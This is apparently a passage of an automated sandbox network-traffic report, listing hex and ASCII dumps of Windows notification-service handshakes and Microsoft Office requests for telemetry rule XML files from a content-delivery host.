                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC1083OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 59 4d 38 68 32 62 4e 65 52 6b 61 38 49 78 64 33 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 33 35 61 63 66 34 37 32 35 66 63 63 64 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 66 6f 77 71 54 65 43 64 79 53 79 76 77 2b 46 39 52 67 2b 5a 42 61 67 36 54 51 4c 49 56 2b 6a 7a 6c 4a 38 41 53 59 35 44 53 51 34 35 4b 70 55 6c 47 43 54 62 66 57 38 71 66 58 6c 33 6f 77 47 63 72 69 34 41 32 66 46 5a 74 53 32 34 36 73 39 51 41 36 6e 46 48 6b 49 46 65 71 42 32 6b 44 34 57 4d 68 78 76 50 75 59 76 51 2b 45 63 48
                                                                                                                                                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: YM8h2bNeRka8Ixd3.2Context: 835acf4725fccd9<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAafowqTeCdySyvw+F9Rg+ZBag6TQLIV+jzlJ8ASY5DSQ45KpUlGCTbfW8qfXl3owGcri4A2fFZtS246s9QA6nFHkIFeqB2kD4WMhxvPuYvQ+EcH
                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 59 4d 38 68 32 62 4e 65 52 6b 61 38 49 78 64 33 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 33 35 61 63 66 34 37 32 35 66 63 63 64 39 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                Data Ascii: BND 3 CON\WNS 0 196MS-CV: YM8h2bNeRka8Ixd3.3Context: 835acf4725fccd9<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC58INData Raw: 4d 53 2d 43 56 3a 20 31 74 59 4c 63 39 54 66 2b 30 4b 6f 4e 6d 41 4e 45 4e 4b 2b 64 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                Data Ascii: MS-CV: 1tYLc9Tf+0KoNmANENK+dQ.0Payload parsing failed.


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                130192.168.2.65853813.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:10 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1364
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                                                                                                x-ms-request-id: 04600955-801e-00ac-55f4-16fd65000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144210Z-1657d5bbd48xsz2nuzq4vfrzg800000002000000000098b4
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                131192.168.2.65853913.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:11 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1397
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                                                                                                x-ms-request-id: 4035d6e2-a01e-0002-4602-175074000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144211Z-1657d5bbd48sdh4cyzadbb374800000001wg00000000g4tk
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                132192.168.2.65854113.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:11 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1403
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                                                                                                x-ms-request-id: 87e26173-201e-0051-15e7-167340000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144211Z-1657d5bbd487nf59mzf5b3gk8n00000001p000000000m2ed
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                133192.168.2.65854213.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:10 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1366
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                                                                                                x-ms-request-id: 52963dc7-601e-0084-0e74-176b3f000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144210Z-1657d5bbd48sqtlf1huhzuwq7000000001s000000000mgw7
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                134192.168.2.65854013.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:11 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1360
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                                                                                                x-ms-request-id: 62f7f1ae-f01e-0096-4d0c-1710ef000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144211Z-1657d5bbd48f7nlxc7n5fnfzh000000001n000000000qte9
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                135192.168.2.65854313.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:11 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1397
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                                                                                                x-ms-request-id: 31868579-401e-008c-0af2-1686c2000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144211Z-1657d5bbd48f7nlxc7n5fnfzh000000001q000000000hm9r
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                136192.168.2.65854413.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:11 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1360
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                                                                                                x-ms-request-id: f076ebb2-f01e-001f-3766-175dc8000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144211Z-1657d5bbd48tnj6wmberkg2xy8000000023000000000nyab
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                137192.168.2.65854613.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:11 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1390
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
